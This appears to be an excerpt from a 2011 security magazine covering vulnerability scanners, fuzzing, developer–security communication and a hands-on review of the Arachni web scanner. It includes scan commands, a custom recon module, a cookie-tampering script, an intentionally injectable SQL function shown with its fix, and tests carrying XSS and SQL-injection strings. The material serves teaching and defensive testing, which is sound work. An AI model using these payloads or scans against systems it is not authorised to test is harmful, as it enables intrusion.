While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most commercial and open source scanners scan the operating system for known weaknesses and unpatched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help with a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard, or Core Impact.

Application Scanners

Most application scanners can observe the functional behaviour of an application, and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.

Web Application Assessment Proxies

Assessment proxies work by interposing themselves between the web browser used by the testers and the target web server, where data can be viewed and manipulated. Such flexibility adds different tricks to exercise the application's weaknesses and its associated components. For example, the penetration testers can view all cookies, hidden HTML fields and other data used by the web application, and attempt to manipulate their values to trick the application.
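In the same spirit as an assessment proxy, the sketch below replays a request with a manipulated cookie to see whether the server re-validates client-side values. The cookie names and target are hypothetical, and requests is a third-party Python library; run this only against systems you are authorized to test:

import requests  # third-party HTTP client

URL = "http://127.0.0.1:8000/cart"   # placeholder target

# First request: observe what the application hands the client.
first = requests.get(URL)
print(first.cookies.get_dict())      # e.g. {'role': 'user', 'price': '100'}

# Replay with manipulated values, as one would do in an intercepting
# proxy, to see whether the server re-validates them.
tampered = requests.get(URL, cookies={"role": "admin", "price": "1"})
print(tampered.status_code, len(tampered.text))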

The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform the standard penetration testing practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of its results. The following are some of the common features that should be implemented within penetration testing tools:

Visibility: the tool must provide the required visibility for the testing team, which can be used for feedback and for reporting the test results.
Extensibility: the tool should be customizable, and it must provide a scripting language or plug-in capabilities that can be used to construct customized penetration tests.
Configurability: a configurable tool is highly recommended to ensure the flexibility of the implementation process.
Documentation: the tool should provide documentation that gives a clear explanation of the probes performed during the penetration testing.
License Flexibility: a tool that can be used without specific constraints, such as a particular IP range or license limits, is a better tool than others.

Security Techniques for Web Apps

Some of the security techniques that can be implemented within a web application to eliminate vulnerabilities are:

Sanitize the data coming from the browser: any data sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookie data, XML, etc.). If web developers fail to sanitize incoming data, attackers might exploit vulnerabilities such as SQL injection, cross-site scripting, and other attacks against the web application.
Validate data before form submission, and manage sessions: cross-site request forgery (CSRF) can occur when a web application accepts form submission data without verifying that it came from the user's own web form. It is imperative for the web application to verify that the submitted form is the one that the application had produced and served.
Configure the server in the best possible way: network administrators have to follow guidelines for hardening web servers, such as: maintain and apply proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (the Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.

In addition to the above guidelines, it is always important to enforce strong passwords for web application users, and to protect stored passwords.
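As a minimal illustration of the second technique, here is a framework-free Python sketch of CSRF token issuance and verification. Real frameworks ship hardened versions of this built in, so treat it as a model, not production code:

import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)  # kept server-side only

def issue_token(session_id: str) -> str:
    """Embed this token in the form the server produces and serves."""
    return hmac.new(SERVER_SECRET, session_id.encode(), "sha256").hexdigest()

def verify_token(session_id: str, submitted: str) -> bool:
    """Accept the form submission only if the token matches the session."""
    expected = issue_token(session_id)
    return hmac.compare_digest(expected, submitted)

token = issue_token("session-abc123")
assert verify_token("session-abc123", token)          # legitimate form post
assert not verify_token("session-abc123", "f" * 64)   # forged cross-site post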

Conclusion

A vulnerability assessment is the process of identifying, prioritizing, quantifying and ranking the vulnerabilities in a system, determining whether there is a weakness in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of the vulnerabilities found in the discovery phase. Unfortunately, an all-clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection; as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications. As automated web application security tools have matured in recent years, automated security assessment will continue over time to reduce both the uncertainty of determination (i.e. false positive results) and the potential to miss some issues (i.e. false negative results). Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools cannot entirely replace manual penetration testing. However, if automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can be used to augment the results for the logical vulnerabilities found alongside automated testing. Finally, it is important to point out that, over time, manual testing for technical vulnerabilities will move from difficult to impossible as the size, scope and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money and effort required to assess thousands of web applications will increase the use of automated tools rather than reliance on the human factor to manually test these applications. Also, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error, and simply can't be trusted.

BRYAN SOLIMAN

Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science, and a Master's degree in Computer Science.

WHAT IS A GOOD FUZZING TOOL?


Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target, the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw. In this article, we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing.

There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer; what are the qualities that a fuzzing tool should have?

PROPERTIES OF A GOOD FUZZING TOOL

Model-based test suites: random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use: most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need domain expertise in the target system to execute tests.
Automated: creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
Test coverage: better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable: time is almost always an issue when it comes to testing. The user must also have control over the fuzzing parameters, such as test coverage. In QA you rarely have much time for testing, and therefore need to run tests fast. Sometimes you can use more time in testing, and can select other test completion criteria.
Documented test cases: when a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation: all found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers so that they can start developing a fix for the found issues.
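As a toy illustration of the anomaly-sending idea (random mutation only; as noted above, model-based generation achieves far better coverage), consider this Python sketch:

import random

VALID_REQUEST = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"

def mutate(data: bytes, rate: float = 0.05) -> bytes:
    """Flip a fraction of bytes to produce anomalous protocol input."""
    out = bytearray(data)
    for i in range(len(out)):
        if random.random() < rate:
            out[i] = random.randrange(256)
    return bytes(out)

def fuzz(target, cases=1000):
    """Feed mutated inputs; an abnormal reaction in `target` is a finding."""
    for seed in range(cases):
        random.seed(seed)               # reproducible, documentable test cases
        case = mutate(VALID_REQUEST)
        try:
            target(case)
        except Exception as exc:        # crash or error = potential flaw
            print(f"case {seed}: {exc!r}")

def toy_parser(request: bytes):
    # Stand-in for the software under test.
    request.split(b"\r\n")[0].decode("ascii")

fuzz(toy_parser)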

MOST COMMON MISTAKES IN FUZZING

Not maintaining proprietary test scripts: proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box: if the requirement for testers is simply to do fuzzing, they almost always choose the quick and dirty solution, which is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find the most flaws in the software.
Using hardware test beds: appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you to wherever testing is needed, and are not locked to a physical test lab.
Unprepared for cloud: a fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups, where you can easily copy the setup to your colleagues or upload it to a cloud environment.

WEB APP SECURITY

Developers are from Venus, Application Security guys from Mars

We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.

pplication Security members are considered like the tax man asking for money. Security is sometimes seen as a cost to pay in order to get an application into Production. Actually, it is a little of everyones fault. Since Security people and Developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve. Lets take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line. Marketers might ask the developers something like, Give us the latest Web 2.0, Social website enabled or something like that to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep. The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas, and eventually begin coding. They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline. Security slowly is pushed aside, so that the coding and production can meet the deadline. Most software architecture is not designed with security in mind and in project Gantt Charts, there usually
01/2011 (1) November

are no security checkpoints included for code testing or allow time for security fixes or remediation. Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this on-line. So, we need to open up firewall to allow access to it. The Security Application group asks for additional information about the application and request documentation of how the application was built. They do not see it from the developers point of view of meeting the deadline that Management has imposed on them. On the other side, developers do not see the problem from a security perspective: What risks to IT infrastructure will potentially be exposed if someone breaks into the new application? One solution to the problem is to execute a penetration tests on the application and look at the results. Then security is happy, since they can test the application and developers are happy once the penetration test report is complete. Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery. Reports usually contain just the symptom. For example, the report might have statements like; a SQL injection is possible, not the real root cause, a parameter taken from a config file is not sanitized before utilization. The report does not contain all

of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem is when the two groups talk to each other at the end of the whole process and use a language with no common ground, which further confuses or annoys everyone and pushes the groups even further apart.
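To make the symptom-versus-root-cause distinction concrete, here is a small Ruby sketch; the database, table and function names are invented for illustration and come from no real report:

require 'sqlite3'

db = SQLite3::Database.new('app.db')   # assumes a users table exists

# Symptom in the report: "a SQL injection is possible" on the name parameter.
# Root cause: the value is interpolated straight into the SQL string.
def find_user_vulnerable(db, name)
  db.execute("SELECT * FROM users WHERE name = '#{name}'")
end

# Remediation a developer can act on: let the driver bind the value;
# quoting tricks like "' OR '1'='1" are then treated as plain data.
def find_user_fixed(db, name)
  db.execute('SELECT * FROM users WHERE name = ?', [name])
end

A report that points at the first function, rather than at the symptom alone, gives the developer something to fix before the deadline.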

Communications Breakdown: You Give Me The Report

Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information that can pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most of the remediation is source code fixes. Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by OWASP Top 10 (most of the time), with some generic remediation steps, such as: implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class, or line where the problem exists so that they can fix it. If provided enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production.

Let's Close the Gap

What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:

- Creating a development framework that has security built into it.
- Designing an API to be used by the application.

Putting security into the framework is the Rails approach. Rails developers added a security facility inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works with a programming language that contains a secure framework for developing web applications. This is true for the Ruby community (other frameworks, like Sinatra, have some security facilities as well). In the Java programming language community, there are a lot of non-standardized frameworks available for Java developers,

but which is the right one to use to ensure secure code development? .NET has one single monolithic framework, and Microsoft has invested money in security and it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code. The effort required is minimal compared to translating implement a filtering policy into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach. The security team and the application developers are now on the same page and everyone is happy. There is a third approach I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber), modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward. Using the WAPT activity, instead of an implement a filtering policy statement, you will produce a set of rspec/cucumber scenarios modeling how the source code can deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases, and when testing is complete and all tests pass, it will mean your source code has implemented a filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group. In the next article we will see how to write some security tests using the BDD approach in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
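As a small taste of that follow-up article, here is a minimal, hedged RSpec sketch of what turning an implement a filtering policy statement into executable scenarios can look like; the application class and routes are assumptions, not part of any real project:

require 'rack/test'
require 'rspec'

describe 'input filtering policy' do
  include Rack::Test::Methods

  # The Rack application under test; assumed to exist elsewhere.
  def app
    MyWebApp
  end

  it 'does not reflect script tags typed into the search box' do
    get '/search', 'q' => '<script>alert(1)</script>'
    expect(last_response.body).not_to include('<script>')
  end

  it 'rejects SQL metacharacters in numeric parameters' do
    get '/products', 'id' => "1' OR '1'='1"
    expect(last_response.status).to eq(400)
  end
end

When both examples pass, the filtering-policy remediation is not a sentence in a report anymore; it is a regression test.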

PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He's interested in code review and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and practicing the Tae kwon-do ITF martial art. He's a husband, a daddy and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.


WEB APP VULNERABILITIES

Pulling the Legs of Arachni


Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos Zapotek Laskos. It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.

Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). These tools are really meant to be used by a skilled consultant doing manual investigations of the application. Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction by the user. Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and must choose the best combination of tools possible for the job at hand. Is Arachni worthwhile? Time for an in-depth review!

Table 1. Overview of Audit and Reconnaissance modules included with Arachni

Audit Modules

- SQL injection
- Blind SQL injection using rDiff analysis
- Blind SQL injection using timing attacks
- CSRF detection
- Code injection (PHP, Ruby, Python, JSP, ASP.NET)
- Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
- LDAP injection
- Path traversal
- Response splitting
- OS command injection (*nix, Windows)
- Blind OS command injection using timing attacks (*nix, Windows)
- Remote file inclusion
- Unvalidated redirects
- XPath injection
- Path XSS
- URI XSS
- XSS
- XSS in event attributes of HTML elements
- XSS in HTML tags
- XSS in HTML 'script' tags

Recon Modules

- Allowed HTTP methods
- Back-up files
- Common directories
- Common files
- HTTP PUT
- Insufficient Transport Layer Protection for password forms
- WebDAV detection
- HTTP TRACE detection
- Credit card number disclosure
- CVS/SVN user disclosure
- Private IP address disclosure
- Common backdoors
- .htaccess LIMIT misconfiguration
- Interesting responses
- HTML object grepper
- E-mail address disclosure
- US Social Security Number disclosure
- Forceful directory listing

Under the Hood

According to the documentation, Arachni offers the following:

- Simplicity: everything is simple and straightforward, from a user's or a component developer's point of view.
- A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plugins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.

We can vouch that both the simplicity and the performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments. Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers, which will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients, and multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.

The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication. The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM. At the start of every scan a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler is always run at the start of the scan. This crawler has filters for redundant pages based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally the crawler can also follow subdomains, and there is an adjustable link count and redirect limit. The HTML parser can extract forms, links, cookies and headers. It can graciously handle badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.

Arachni offers a very simple and easy to use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules; Table 1 provides an overview. Arachni also offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization and the Metareport, which provides Metasploit integration for automated and assisted exploitation. Finally, Arachni has many built-in plug-ins that have direct access to the framework instance and can be used to add any functionality to Arachni. Table 2 provides an overview of currently available plug-ins.

Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni

- Passive Proxy: Analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging-in and/or restricting the scope of the audit.
- Form based AutoLogin: Performs an automated login.
- Dictionary attacker: Performs dictionary attacks against HTTP Authentication and Forms based authentication.
- Profiler: Performs taint analysis with benign inputs and response time analysis.
- Cookie collector: Keeps track of cookies while establishing a timeline of the changes.
- Healthmap: Generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL.
- Content-types: Logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files.
- WAF (Web Application Firewall) Detector: Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes.
- Metamodules: Loads and runs high-level meta-analysis modules pre/mid/post-scan:
  - AutoThrottle: Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.
  - TimeoutNotice: Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing.
  - Uniformity: Reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization.

Installation

Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid). This is great if you want to speed up the scan, or if you want to execute some crazy things like running your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.


Let's get our hands dirty and start with the experimental branch (currently at version 0.4) so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows. Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run Arachni natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.

Linux

Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1. This will install all source directories in your home directory; change all the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three source directories and perform:

$ git pull

Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus related error while running Arachni, issue:

$ gem clean

Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install

Windows

Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go. Please note that these installation instructions start with the installation of Cygwin and all required dependencies. Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:

- Database: libsqlite3-devel, libsql3_0
- Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
- Editors: nano
- Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
- Net: libcurl-devel, libcurl4

Listing 2. Installation for Windows

The commands are the same as in Listing 1, starting from the eventmachine clone; the apt-get step is replaced by the Cygwin packages listed above.


Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades; in any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier. Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:

$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES

Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:

$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install

Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org/ and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:

$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install

From your Cygwin shell, update and install some necessary modules:

$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem

Finally we can install Arachni (and the source) by executing the commands of Listing 2 in the Cygwin shell. In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:

$ find /usr/local/ -iname *.so > /tmp/local.so.lst

Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose run as administrator. Enter in ash:

$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/local.so.lst

Exit ash.

Light my Fire

How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command-line. The GUI can be started by executing the following commands:

$ arachni_rpcd &
$ arachni_web

After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.

Figure 1. Edit Dispatchers



If you want to use the command-line interface, just execute:
$ arachni --help

Your First Scan

We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr


Afterwards the HTML report can be created by executing the following:


$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html

That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help

Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment), and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod

Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*, -xss_* http://www.example.com

Figure 2. Start a scan screen

The above will load all modules, except the modules related to Cross-Site-Scripting (XSS). Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher. A quick overview of the other screens (Figure 1):

- Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues are detected and how far along the process is.
- Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS), SQL Injection (SQLi) and Cross-Site-Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
- Plugins: plug-ins help to automate tasks. Plugins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, etc.
- Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, etc.
- Reports: gives access to the scan reports. Arachni creates reports in its own internal format, and exports them to HTML, XML or text.
- Add-ons: three add-ons are installed: Auto-deploy (converts any SSH-enabled Linux box into an Arachni dispatcher), Tutorial (serves as an example) and Scheduler (schedules and runs scan jobs at a specific time).
- Log: overview of actions taken by the GUI.

Next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen. If you want to run a scan against some test applications, visit my blog for the list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner). After the scan, just go to the Reports screen and download the report in the format you want.

Listing 3. Create your own module


=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy and distribute and modify
  this program under the term of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists generated
# from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing/
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited     ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) { |file|
            @@__directories << file unless file.include?( '?' )
        }
    end

    def run( )
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( "Scanning SVNDigger Dirs..." )

        @@__directories.each { |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) { |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories, based on wordlists created
                from open source repositories. The wordlist utilized by this
                module will be vast and will add a considerable amount of time
                to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing/',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => 'Review these resources manually. Check if ' +
                                    'unauthorized interfaces are exposed, ' +
                                    'or confidential information.',
                :remedy_code     => ''
            }
        }
    end

end
end
end



Create your Own Module
Arachni is very modular and can easily be extended. In the following example we create a new reconnaissance module. Move into your Arachni source tree and you'll find the modules directory; in there you'll find two directories: audit and recon. Move into the recon directory, where we will create our Ruby module. Arachni makes it real easy: if your module needs external files, it will search in a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the /modules/recon/svn_digger_dirs subdirectory. Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories. If there is a directory that needed to be protected and you forgot to do so, it will be found by a scanner that uses these wordlists. Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using. Download the wordlists from the SVNDigger URL mentioned in the listing. Create a directory /modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory. Create a copy of the file /modules/recon/common_directories.rb and name it svn_digger_dirs.rb, then change the code to read as in Listing 3. The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in further scans) and creates a report entry for it. Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
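To recap the moving parts of Listing 3 in isolation, here is a stripped-down sketch of a recon module; the module name and the backup/ directory are invented for illustration, but the helpers are the same ones the real module uses:

module Arachni
module Modules

# Minimal recon module: check a single directory and log it if found.
class SkeletonDirCheck < Arachni::Module::Base

    def run
        # get_path() reduces the page URL to its directory part.
        url = get_path( @page.url ) + 'backup/'

        # The helper issues the request and yields only on a hit.
        log_remote_directory_if_exists( url ) { |res|
            print_ok( "Found #{res.effective_url}" )
        }
    end

    def self.info
        {
            :name    => 'SkeletonDirCheck',
            :author  => 'you',
            :version => '0.1'
        }
    end

end

end
end

Everything Listing 3 adds on top of this (the wordlist in prepare, the audited-paths set, the metadata in self.info) is bookkeeping around that same run method.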

Conclusion

We used Arachni in many of our application vulnerability assessments. The good points are:

- Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
